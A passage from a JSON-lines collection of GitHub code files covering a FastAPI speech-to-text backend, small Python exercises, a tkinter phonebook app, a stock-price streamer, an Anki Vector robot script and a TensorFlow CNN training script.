for c in conversations:\n posCnt += c[\"Sentiment\"] == \"Positive\"\n objCnt += 1\n\n request[\"Sentiment_Distribution_Pos\"] = posCnt / objCnt * 100\n request[\"Sentiment_Distribution_Neg\"] = (objCnt - posCnt) / objCnt * 100\n print(request)\n\n words = []\n cnt = 1\n for key, value in word_counts.items():\n\n obj = dict()\n obj[\"Word_ID\"] = cnt\n obj[\"Word\"] = key\n obj[\"IsSensitive\"] = SensitiveWordsMarking(str(key)).isSensitiveWord()\n obj[\"Word_Count\"] = value\n obj[\"Request_ID\"] = request[\"Request_ID\"]\n words.append(obj)\n\n cnt += 1\n\n # Insert Data to MSSQL\n word_list = []\n conversation_list = []\n\n request_data = [\n (\n request[\"Request_ID\"],\n request[\"Audio_URL\"],\n request[\"Sentiment_Distribution_Pos\"],\n request[\"Sentiment_Distribution_Neg\"],\n request[\"Highest_Count\"],\n request[\"Date\"],\n request[\"Org_ID\"],\n )\n ]\n\n cursor.executemany(\n \"INSERT INTO Request (Request_ID, Audio_URL, Sentiment_Distribution_Pos, Sentiment_Distribution_Neg, Highest_Count, Date, Org_ID) VALUES (%s,%s,%s,%s,%d,%s,%s)\",\n request_data,\n )\n\n for w in words:\n words_data = (\n w[\"Word_ID\"],\n w[\"Word\"],\n w[\"IsSensitive\"],\n w[\"Word_Count\"],\n w[\"Request_ID\"],\n )\n word_list.append(words_data)\n\n cursor.executemany(\n \"INSERT INTO Words (Word_ID, Word, IsSensitive, Word_Count, Request_ID) VALUES (%d,%s,%d,%d,%s)\",\n word_list,\n )\n\n for c in conversations:\n conversation_data = (\n c[\"Conversation_ID\"],\n c[\"Sender\"],\n c[\"Content\"],\n c[\"Sentiment\"],\n c[\"Confidence\"],\n c[\"Comment\"],\n c[\"Request_ID\"],\n )\n conversation_list.append(conversation_data)\n\n cursor.executemany(\n \"INSERT INTO Conversations (Conversation_ID, Sender, Content, Sentiment, Confidence, Comment, Request_ID) VALUES (%d,%s,%s,%s,%s,%s,%s)\",\n conversation_list,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/deleteComment/{conversation_id}/{request_id}\")\ndef deleteComment(\n conversation_id: int,\n request_id: str,\n delete_comment: DeleteQuery,\n req: Request,\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Comment FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n db_old_comment = cursor.fetchone()[0]\n # db_old_comment = True\n if delete_comment.old_comment != db_old_comment:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Comment = '' WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/updateComment/{conversation_id}/{request_id}\")\ndef updateComment(\n conversation_id: int,\n request_id: str,\n comment_update: CommentQuery,\n req: Request,\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Comment FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d \",\n values,\n )\n\n db_old_comment = cursor.fetchone()[0]\n\n if comment_update.old_comment != db_old_comment:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (comment_update.comment, request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Comment = %s WHERE Request_ID= %s AND Conversation_ID= %d \",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Success\"}\n\n\n@app.post(\"/stt/updateSender/{conversation_id}/{request_id}\")\ndef updateSender(\n conversation_id: int, request_id: str, sender_update: SenderQuery, req: Request\n):\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n values = (request_id, conversation_id)\n\n cursor.execute(\n \"SELECT Sender FROM Conversations WHERE Request_ID= %s AND Conversation_ID=%d\",\n values,\n )\n\n db_old_sender = cursor.fetchone()[0]\n # db_old_sender = 1\n if sender_update.old_sender != db_old_sender:\n conn.commit()\n return {\"response\": \"Error\"}\n\n values = (sender_update.sender, request_id, conversation_id)\n\n cursor.execute(\n \"UPDATE Conversations SET Sender = %s WHERE Request_ID= %s AND Conversation_ID= %d\",\n values,\n )\n\n conn.commit()\n\n return {\"response\": \"Updated Successfully\"}\n\n\n@app.get(\"/stt/requests/{org_id}\")\nasync def ReturnRequests(org_id: str, req: Request):\n\n print(req.headers)\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n\n db_token_id = cursor.fetchone()\n\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n cursor.execute(\"SELECT Request_ID FROM Request WHERE Org_ID = %s\", org_id)\n rows = cursor.fetchall()\n # rows = 1\n RequestList = []\n for row in rows:\n data = row[0]\n RequestList.append(data)\n\n result = json.dumps(RequestList)\n\n return {\"Request\": result}\n\n\n@app.get(\"/stt/request/{req_id}\")\nasync def STT_Test(req_id: str, req: Request):\n\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n\n db_token_id = cursor.fetchone()\n\n # db_token_id = True\n if db_token_id is None:\n return {\"response\": \"Error\"}\n else:\n cursor.execute(\"SELECT * FROM Request WHERE Request_ID = %s\", req_id)\n rows = cursor.fetchall()\n for row in rows:\n data = {\n \"request_id\": row[0],\n \"sentiment\": {\"distribution\": {\"pos\": row[2], \"neg\": row[3]}},\n \"highest_count\": row[4],\n \"date\": row[5],\n }\n\n cursor.execute(\"SELECT * FROM Words WHERE Request_ID = %s \", req_id)\n rows = cursor.fetchall()\n objects_list = []\n for row in rows:\n object_dict = {\n \"word_id\": row[0],\n \"word\": row[1],\n \"isClicked\": False,\n \"isSearched\": True,\n \"isSensitive\": row[2],\n \"count\": row[3],\n }\n objects_list.append(object_dict)\n\n cursor.execute(\"SELECT * FROM Conversations WHERE Request_ID = %s \", req_id)\n rows = cursor.fetchall()\n objects_list1 = []\n for row in rows:\n object_dict = {\n \"conversation_id\": row[0],\n \"from\": row[1],\n \"content\": row[2],\n \"sentiment\": row[3],\n \"confidence\": row[4],\n \"isClicked\": False,\n \"comment\": row[5],\n }\n objects_list1.append(object_dict)\n\n result_dict = {\n \"request_id\": data[\"request_id\"],\n \"sentiment\": data[\"sentiment\"],\n \"highest_count\": data[\"highest_count\"],\n \"date\": data[\"date\"],\n \"words\": objects_list,\n \"conversations\": objects_list1,\n }\n\n result = json.dumps(result_dict)\n\n # with open(\"sample.json\", \"w\") as outfile:\n # outfile.write(result)\n\n return {\"Request\": result}\n","repo_name":"tzubindev/STT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23407475128","text":"\"\"\" PROBLEM\n\tFind the min and max simultaneously\n\n\"\"\"\n\n\"\"\" SOLUTION\n\tCompare every pair with a step size of 2. Compute the local min and local max \n\tfor each pair and update the global min and global max.\n\n\"\"\"\n\ndef find_min_max(A):\n\tdef min_max(a,b):\n\t\tif a < b:\n\t\t\treturn a, b\n\t\telse:\n\t\t\treturn b, a\n\n\tif len(A) == 1:\n\t\treturn (A[0], A[0])\n\n\tglobal_minm, global_maxm = min_max(A[0], A[1])\n\n\tfor i in range(2, len(A)-1, 2):\n\t\tlocal_minm, local_maxm = min_max(A[i], A[i+1])\n\t\tglobal_minm, global_maxm = min(local_minm, global_minm), max(local_maxm, global_maxm)\n\t\n\t# odd elements case\n\tif len(A)%2 == 1:\n\t\tglobal_minm, global_maxm = min(A[-1], global_minm), max(A[-1], global_maxm)\n\n\treturn global_minm, global_maxm \n\n\nA = [3,2,5,1,2,4]\nres = find_min_max(A)\nprint(\"Array: {}\\nMin: {}, Max: {}\".format(A, res[0], res[1]))\n\n","repo_name":"sheelabhadra/Elements-Programming-Interviews","sub_path":"Strings/max_min_simultaneously.py","file_name":"max_min_simultaneously.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16684769564","text":"import time\nimport telebot\n\n\nfrom tinkoff.invest import CandleInterval\nfrom tinkoff.invest.retrying.settings import RetryClientSettings\nfrom tinkoff.invest.retrying.sync.client import RetryingClient\nfrom tinkoff.invest.utils import now\n\nfrom config import ACCESS_TOKEN\nfrom transformation import *\nfrom database import *\nfrom extraction import *\n\n# Формирование исторического массива данных\ndef getHistoryShare(shareList):\n historyShare = {}\n retry_settings = RetryClientSettings(use_retry=True, max_retry_attempt=2)\n with RetryingClient(ACCESS_TOKEN, settings=retry_settings) as client:\n for candle in client.get_all_candles(\n figi=shareList[3],\n from_=now() - timedelta(days=1),\n interval=CandleInterval.CANDLE_INTERVAL_1_MIN,\n ):\n historyShareDetail = {}\n # Формирование детализации\n historyShareDetail['name'] = shareList[1]\n historyShareDetail['ticker'] = shareList[2]\n historyShareDetail['FIGI'] = shareList[3]\n historyShareDetail['lot'] = shareList[6]\n historyShareDetail['realPrice'] = convertToRealPrice(candle.open.units, candle.open.nano)\n historyShareDetail['unitsPrice'] = candle.open.units\n historyShareDetail['nanoPrice'] = candle.open.nano\n historyShareDetail['timeCandle'] = convertToRealDateTime(candle.time)\n\n # Формирование словаря\n historyShare[convertToTimeStamp(candle.time)] = historyShareDetail\n\n return historyShare\n\ndef streamingShareOnline():\n shareList = getShareRub()\n\n while True:\n for share in shareList:\n try:\n historyShare = getHistoryShare(share)\n if len(historyShare) > 0:\n if historyShare is not None:\n extractionHistoryData(historyShare)\n time.sleep(1.2)\n except Exception as error:\n print(error)\n continue\n finally:\n continue\n\ndef main():\n streamingShareOnline()\n\nif __name__ == '__main__':\n main()\n","repo_name":"PhilippKaz/StreamerSharesTinkoff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31249131781","text":"# ----------------------------------------\n# 22\n# Variables\n# ----------------------------------------\nfrom modules.utils import *\n\n\nbanner('Strings')\n# ----------------------------------------\n\ngreeting = \"Bruce\"\n_myName = \"Tim\"\nTim45 = \"Good\"\nTim_Was_57 = \"Hello\"\nGreeting = \"There\"\n\nprint(Tim_Was_57 + ' ' + greeting)\n\nage = 48\n# ERROR: Cant concat a string and an integer\n# print(greeting + age)\n\n\nbanner('Numbers')\n# ----------------------------------------\n\na = 12\nb = 3\n\nprint(a+b)\nprint(a-b)\nprint(a*b)\n\n\n# BELOW: normally this is division that returns as an integer.\n# However, 3.6.4 by default seems to do the conversion.\n# It only forces a float when one of the numbers is actually\n# a float\n\nprint(a/b)\nprint(a//b)\nprint(a % b)\n\nbanner(\"For Loop\")\n# ----------------------------------------\nfor i in range(1, a/b):\n\tprint(i)\n\n\nbanner(\"Formulas & Casting\")\n# ----------------------------------------\nformula = ((((a + b) / 3) - 4) * 12)\nprint(formula)\nprint(float(formula)) # implicit cast to float\n\na = \"RobK\"\nb = 48\nprint(a+str(b)) # implicit cast to string\n","repo_name":"rob-kistner/udemy-python-masterclass","sub_path":"22_variables.py","file_name":"22_variables.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7598463358","text":"#frequency analysis of a given plain text\nfrom collections import Counter\n\ndef is_ascii(s):\n return all(ord(c) < 128 for c in s)\n\ndef is_english(s):\n if (is_ascii(s)):\n text = ''.join(c for c in s if c.isalpha())\n if (text == ''):\n return False\n else:\n lext = text.lower()\n chk = 'etaoin'\n cnt = Counter(lext).most_common(3)\n cntn = [cnt[0][0],cnt[1][0],cnt[2][0]]\n cntjn = ''.join(cntn)\n print(cnt)\n for x in cntjn:\n if x not in chk:\n return False\n else:\n return True\n\n \n","repo_name":"krakhit/Information-security-course","sub_path":"plaintextfreq.py","file_name":"plaintextfreq.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41328260438","text":"from tkinter import *\nimport datetime\nfrom mypeople import Mypeople\nfrom addpeople import Addpeople\nfrom Aboutus import About\n\ndate = datetime.datetime.now().date()\ndate = str(date)\n\nclass Application(object):\n def __init__(self,master):\n self.master =master\n\n\n\n # frame\n self.top =Frame(master, height =150 , bg=\"white\")\n self.top.pack(fill =X)\n\n self.bottom = Frame(master, height=500, bg=\"RoyalBlue1\")\n self.bottom.pack(fill=X)\n\n # top frame design\n self.top_image = PhotoImage(file = '4.png')\n self.top_image_label = Label(self.top,image = self.top_image,bg=\"white\")\n self.top_image_label.place(x=100,y=10)\n\n self.heading =Label(self.top,text=\"PhoneBook\",font=\"Times 26 bold\",bg=\"white\",fg = \"#426ff5\")\n self.heading.place(x=220,y=40)\n\n self.heading = Label(self.top, text=\"App\", font=\"Times 26 bold\", bg=\"white\", fg=\"#111\")\n self.heading.place(x=400, y=40)\n\n # date\n self.date_label = Label(self.top,text=\"Date: \"+date, font=\"times 12 bold\",fg=\"#111\",bg=\"white\")\n self.date_label.place(x=520,y=5)\n\n\n # button1 view People\n self.viewbtn =Button(self.bottom, text =\"My People\" ,font=\"times 12 bold\",width =\"20\",bg=\"RoyalBlue3\",fg=\"white\",command=self.my_people)\n self.viewbtn.place(x=250,y=40)\n self.bottom_image = PhotoImage(file='5.1.png')\n self.bottom_image_label = Label(self.bottom, image=self.bottom_image,bg=\"RoyalBlue1\")\n self.bottom_image_label.place(x=180, y=30)\n\n # button2 add People\n self.addpeople = Button(self.bottom, text=\"Add People\", font=\"times 12 bold\", width=\"20\",bg=\"RoyalBlue3\",fg=\"white\",command = self.addpeoplefunction)\n self.addpeople.place(x=250, y=180)\n self.bottom_image1 = PhotoImage(file='6.1.png')\n self.bottom_image1_label = Label(self.bottom, image=self.bottom_image1, bg=\"RoyalBlue1\")\n self.bottom_image1_label.place(x=180, y=170)\n\n\n\n # button3 about us\n self.aboutus = Button(self.bottom, text=\"About Us\", font=\"times 12 bold\", width=\"20\",bg=\"RoyalBlue3\",fg=\"white\",command = self.about_us)\n self.aboutus.place(x=250, y=290)\n self.bottom_image2 = PhotoImage(file='8.1.png')\n self.bottom_image2_label = Label(self.bottom, image=self.bottom_image2, bg=\"RoyalBlue1\")\n self.bottom_image2_label.place(x=180, y=280)\n\n def my_people(self):\n people = Mypeople()\n def addpeoplefunction(self):\n addpeoplewindow = Addpeople()\n def about_us(self):\n about_page= About()\ndef main():\n root=Tk()\n app= Application(root)\n root.title(\"PhoneBook\")\n root.geometry(\"650x550+350+200\")\n root.resizable(False,False)\n root.mainloop()\n\n\nif __name__== '__main__':\n main()","repo_name":"Sarthak88221/Phonebook-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18165232652","text":"import sys\nimport anki_vector\nfrom anki_vector.events import Events\nfrom anki_vector.util import degrees\nimport functools\nimport threading\nimport io\nimport time\n\nevt = threading.Event()\n\n#Create an event listener for audible cue\n#In this instance, it's upon hearing the\n#words \"Hey, Vector\"\n\ndef on_wake_word(): \n robot.anim.play_animation(\"anim_observing_far_subtle_01\")\n robot.anim.play_animation(\"anim_referencing_curious_01_head_angle_20\")\n print(\"Starting video viewer. Use Ctrl+C to quit.\")\n robot.say_text(\"Quietly observing from the shadows.\")\n time.sleep(20)\n robot.viewer.stop_video\n\n\ndef main(): \n args = anki_vector.util.parse_command_args()\n with anki_vector.Robot(args.serial,\n show_viewer=True, \n enable_camera_feed=True,) as robot:\n on_wake_word = functools.partial(on_wake_word, robot)\n robot.events.subscribe(on_wake_word, Events.wake_word)\n #robot.conn.run_coroutine(robot.events.dispatch_event_by_name('say_it dispatched', event_name='say_it'))\n\n try:\n while True:\n time.sleep(10)\n except KeyboardInterrupt:\n pass\n\n robot.events.unsubsribe(on_wake_word, Events.wake_word)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"publikwerker/anki_security","sub_path":"anki_security2.py","file_name":"anki_security2.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41727034178","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Enable Slumber\n (r'^slumber/', include('slumber.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/(.*)', admin.site.root),\n)\n","repo_name":"hotkit/django-async","sub_path":"test-projects/django_1_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"70591756035","text":"\"\"\"Marc Ojalvo and Daniel Licht\nCMPS 1500\nThursday 3:30-4:45\nLab 6 Part 0\n02/05/2018\"\"\"\n\n'''This program contains two functions used to determine whether lists\nof numbers are sorted.\n'''\n\ndef is_sorted(aList):\n \"\"\"Returns True if a list is in increasing order and\n False if not.\n Args:\n aList (list): List of numbers\n Returns:\n True (bool): If in increasing order\n False (bool): If not in increasing order\n \"\"\"\n if len(aList) <= 1:\n return True\n if aList[0] < aList[1]:\n return is_sorted(aList[1:])\n else:\n return False\n \ndef is_file_sorted(filename):\n \"\"\"Returns True if a file of numbers is in increasing order and\n False if not.\n Args:\n filename (str): File of numbers\n Returns:\n True (bool): If in increasing order\n False (bool): If not in increasing order\n \"\"\"\n f = open(filename, 'r')\n text = f.read()\n f.close\n numList = text.split()\n for i in range(len(numList)):\n numList[i] = int(numList[i])\n return is_sorted(numList)\n\n\n","repo_name":"daniellicht13/CMPS-1500","sub_path":"1500/Lab 6/lab6pr0.py","file_name":"lab6pr0.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10740399627","text":"def gcdIter(a, b):\r\n #gcd = 0\r\n if a>b:\r\n small = b\r\n large = a\r\n else:\r\n small = a\r\n large = b\r\n \r\n if large%small == 0:\r\n gcd = small\r\n else: \r\n for i in range(1,round(small/2)):\r\n if small%i == 0 and large%i ==0:\r\n gcd = i\r\n return gcd\r\nprint(gcdIter(49,7))\r\n#print(round(1/2))","repo_name":"subratcall/EDX_Intro-to-CS-with-python_MIT6001X","sub_path":"week-2/p4_gcd_with_iteration.py","file_name":"p4_gcd_with_iteration.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4614734188","text":"\"\"\"Train a Convolutional Neural Network.\r\nThis version uses data converted to a TFRecords file containing tf.train.Example \r\nprotocol buffers.\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport os\r\nimport time\r\nimport datetime\r\nimport math\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pylab as plt\r\n\r\n# Basic model parameters as external flags.\r\nflags = tf.app.flags\r\nFLAGS = flags.FLAGS\r\nflags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\r\nflags.DEFINE_integer('num_epochs', 10, 'Number of epochs to run trainer.')\r\nflags.DEFINE_integer('num_epochs_eval', 1, 'Number of epochs to run evaluation.')\r\nflags.DEFINE_integer('batch_size', 100, 'Batch size.')\r\nflags.DEFINE_integer('image_pixels', 4800, 'Number of pixels in image')\r\n\r\nflags.DEFINE_integer('hidden1', 32, 'Number of units in hidden layer 1.')\r\nflags.DEFINE_integer('hidden2', 2, 'Number of units in hidden layer 2.')\r\nflags.DEFINE_integer('num_classes', 1, 'Number of classes')\r\n\r\nflags.DEFINE_string('train_dir', 'output', 'Directory with the training data.')\r\nflags.DEFINE_string('training_data_file', 'train-00000-of-00001', 'Training data file')\r\nflags.DEFINE_string('evaluation_data_file', 'validation-00000-of-00001', 'Training data file')\r\n\r\n\r\ndef read_and_decode(filename_queue):\r\n reader = tf.TFRecordReader()\r\n _, serialized_example = reader.read(filename_queue)\r\n features = tf.parse_single_example(\r\n \tserialized_example,\r\n \tfeatures={\r\n 'image/height':tf.FixedLenFeature([], tf.int64),\r\n 'image/width': tf.FixedLenFeature([], tf.int64),\r\n 'image/colorspace': tf.FixedLenFeature([], tf.string),\r\n 'image/channels': tf.FixedLenFeature([], tf.int64),\r\n 'image/class/label': tf.FixedLenFeature([], tf.int64),\r\n 'image/class/text': tf.FixedLenFeature([], tf.string),\r\n 'image/format': tf.FixedLenFeature([], tf.string),\r\n 'image/filename': tf.FixedLenFeature([],tf.string),\r\n 'image/encoded': tf.FixedLenFeature([], tf.string),\r\n 'image/avg_intensity': tf.FixedLenFeature([], tf.float32),\r\n 'image/intensity_label': tf.FixedLenFeature([], tf.float32)\r\n })\r\n\r\n # Convert from a scalar string tensor to a uint8 tensor with shape\r\n # [FLAGS.image_pixels].\r\n image = tf.decode_raw(features['image/encoded'], tf.uint8)\r\n image.set_shape([FLAGS.image_pixels])\r\n\r\n # Convert from [0, 255] -> [-0.5, 0.5] floats.\r\n image = tf.cast(image, tf.float32) * (1. / 255) - 0.5\r\n \r\n # Convert pixel intensity\r\n gt = tf.cast(features['image/avg_intensity'], tf.float32) * (1. / 255) - 0.5\r\n \r\n # Add noise to ground truth\r\n label = tf.cast(features['image/intensity_label'], tf.float32) * (1. / 255) - 0.5\r\n\r\n return image, label, gt\r\n\r\n \"\"\"Reads input data num_epochs times.\r\n Args:\r\n train: Selects between the training (True) and validation (False) data.\r\n batch_size: Number of examples per returned batch.\r\n num_epochs: Number of times to read the input data, or 0/None to\r\n train forever.\r\n Returns:\r\n A tuple (images, labels), where:\r\n * images is a float tensor with shape [batch_size, FLAGS.image_height, FLAGS.image_width, FLAGS.num_channels]\r\n in the range [-0.5, 0.5].\r\n * labels is an int32 tensor with shape [batch_size] with the true label,\r\n a number in the range [0, FLAGS.num_classes).\r\n Note that an tf.train.QueueRunner is added to the graph, which\r\n must be run using e.g. tf.train.start_queue_runners().\r\n \"\"\"\r\ndef inputs(train, batch_size, num_epochs):\r\n\r\n if not num_epochs: num_epochs = None\r\n filename = os.path.join(FLAGS.train_dir,\r\n FLAGS.training_data_file if train else FLAGS.evaluation_data_file)\r\n\r\n with tf.name_scope('input'):\r\n filename_queue = tf.train.string_input_producer(\r\n [filename], num_epochs=num_epochs)\r\n\r\n # Even when reading in multiple threads, share the filename queue\r\n image, label, gt = read_and_decode(filename_queue)\r\n\r\n # Shuffle the examples and collect them into FLAGS.batch_size batches.\r\n # (Internally uses a RandomShuffleQueue.)We run this in two threads to avoid being a bottleneck.\r\n images, sparse_labels, gt = tf.train.shuffle_batch(\r\n [image, label, gt], batch_size=batch_size, num_threads=2,\r\n capacity=1000 + 3 * batch_size,\r\n # Ensures a minimum amount of shuffling of examples.\r\n min_after_dequeue=1000)\r\n \r\n return images, sparse_labels, gt\r\n\r\ndef weight_variable(shape):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\ndef bias_variable(shape):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\ndef conv2d(x, W):\r\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x):\r\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\r\n strides=[1, 2, 2, 1], padding='SAME')\r\n\t\r\ndef inference_graph(images, train):\r\n\r\n\t### Dimension info: images shape: unknown at this point since images is a placeholder\r\n\t### Dimension info: images shape: expected to be [100, 4800] for a batch size of 100 and image size 60*80*1\r\n\tprint(\"images dim:\")\r\n\tprint(images.get_shape())\r\n\t\r\n\t### Dimension info: images_reshaped shape: expected to be [100, 60, 80, 1]\r\n\timages_reshaped = tf.reshape(images, [-1,60,80,1])\r\n\t#images_resized = tf.image.resize_images(images_reshaped, [60,80])\r\n\tprint(\"images_reshaped size:\")\r\n\tprint(images_reshaped.get_shape())\r\n\t\r\n\t#To compute 32 features for each 5*5 patch - dimensions: [patch size, patch size, input channels, output channels]\r\n\tW_conv1 = weight_variable([5, 5, 1, 4])\r\n\tb_conv1 = bias_variable([4])\r\n\t\r\n\t### Dimension info: h_conv1 shape: expected to be [100, 60, 80, 4]\r\n\th_conv1 = tf.nn.relu(conv2d(images_reshaped, W_conv1) + b_conv1)\r\n\tprint(\"conv1 shape:\")\r\n\tprint(h_conv1.get_shape())\r\n\t\r\n\t#To compute 64 features for each 5*5 patch - dimensions: [patch size, patch size, input channels, output channels]\r\n\tW_conv2 = weight_variable([5, 5, 4, 4])\r\n\tb_conv2 = bias_variable([4])\r\n\t\r\n\t### Dimension info: h_conv2 shape: expected to be [100, 60, 80, 4]\r\n\th_conv2 = tf.nn.relu(conv2d(h_conv1, W_conv2) + b_conv2)\r\n\tprint(\"conv2 shape:\")\r\n\tprint(h_conv2.get_shape())\r\n\t\r\n\tW_fc1 = weight_variable([60 * 80 * 4, FLAGS.hidden1])\r\n\tprint(W_fc1.get_shape())\r\n\tb_fc1 = bias_variable([FLAGS.hidden1])\r\n\t\r\n\t### Dimension info: h_pool2_flat shape: expected to be [100, 19200]\r\n\th_conv2_flat = tf.reshape(h_conv2, [-1, 60 * 80 * 4])\r\n\tprint(\"conv2_flat shape:\")\r\n\tprint(h_conv2_flat.get_shape())\r\n\t\r\n\t### Dimension info: h_fc1 shape: expected to be [100, 128]\r\n\th_fc1 = tf.nn.relu(tf.matmul(h_conv2_flat, W_fc1) + b_fc1)\r\n\tprint(\"fully connected shape:\")\r\n\tprint(h_fc1.get_shape())\r\n\t\t\r\n\tW_fc2 = weight_variable([FLAGS.hidden1, FLAGS.num_classes])\r\n\tb_fc2 = bias_variable([FLAGS.num_classes])\r\n\t\r\n\t### Dimension info: logits shape: expected to be [100, 1]\r\n\tlogits = tf.matmul(h_fc1, W_fc2) + b_fc2\r\n\tprint(\"logits shape:\")\r\n\tprint(logits.get_shape())\r\n\t\r\n\tlogits = tf.cast(logits, tf.float32)\r\n\t\r\n\treturn logits\r\n\t\r\n\t\r\n\"\"\"Build the training graph.\r\n Args:\r\n logits: Logits tensor, float - [BATCH_SIZE, NUM_CLASSES].\r\n labels: Labels tensor, int32 - [BATCH_SIZE], with values in the\r\n range [0, NUM_CLASSES).\r\n learning_rate: The learning rate to use for gradient descent.\r\n Returns:\r\n train_op: The Op for training.\r\n loss: The Op for calculating loss.\r\n\"\"\"\r\n \r\ndef training_graph(logits, labels, learning_rate):\r\n\r\n print(\"logits shape\")\r\n print(logits.get_shape())\r\n \r\n # Reshape logits into a 1D array\r\n flattened_logits = tf.reshape(logits, [-1])\r\n \r\n print(\"flattened logits shape\")\r\n print(flattened_logits.get_shape())\r\n \r\n # Define the cost function\r\n loss = tf.reduce_sum(tf.square(flattened_logits-labels)) / FLAGS.batch_size\r\n \r\n # Create the gradient descent optimizer with the given learning rate.\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\r\n \r\n # Create a variable to track the global step (iteration).\r\n global_step = tf.Variable(0, name='global_step', trainable=False)\r\n \r\n # Use the optimizer to apply the gradients that minimize the loss\r\n # (and also increment the global step counter) as a single training step.\r\n train_op = optimizer.minimize(loss, global_step=global_step)\r\n \r\n return train_op, loss\r\n \r\ndef run_training():\r\n\t# Tell TensorFlow that the model will be built into the default Graph.\r\n\ttreedom_graph=tf.Graph()\r\n\twith treedom_graph.as_default():\r\n\t\r\n\t\t#Generate placeholders for images and labels\r\n\t \t#Ensures that the same graph can be used for training, inference and evaluation later.\r\n\t images_placeholder=tf.placeholder(tf.float32)\r\n\t labels_placeholder=tf.placeholder(tf.float32)\r\n\t \r\n\t #Remember these operands\r\n\t tf.add_to_collection(\"images\", images_placeholder)\r\n\t tf.add_to_collection(\"labels\", labels_placeholder)\r\n\t \r\n\t # Build a Graph that computes predictions from the inference model.\r\n\t logits = inference_graph(images_placeholder, True)\r\n\t \r\n\t #remember this operation\r\n\t tf.add_to_collection(\"logits\", logits)\r\n\t \r\n\t #create images and labels\r\n\t images, labels, gts = inputs(train=True, batch_size=FLAGS.batch_size, num_epochs=FLAGS.num_epochs)\r\n\t #images_eval, labels_eval = inputs(train=False, batch_size=FLAGS.batch_size, num_epochs=FLAGS.num_epochs_eval)\r\n\t print(\"printing images and labels\")\r\n\t print(images)\r\n\t print(labels)\r\n\t print(gts)\r\n\t \r\n\t #create train and loss op\r\n\t train_op, loss =training_graph(logits, labels_placeholder, FLAGS.learning_rate)\r\n\t \t \r\n\t #ititalize global and local variables\r\n\t init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n\t \r\n\t #Create a saver for writing training checkpoints\r\n\t saver=tf.train.Saver()\r\n\t #print(\"end\")\r\n\t \r\n\twith tf.Session(graph=treedom_graph) as 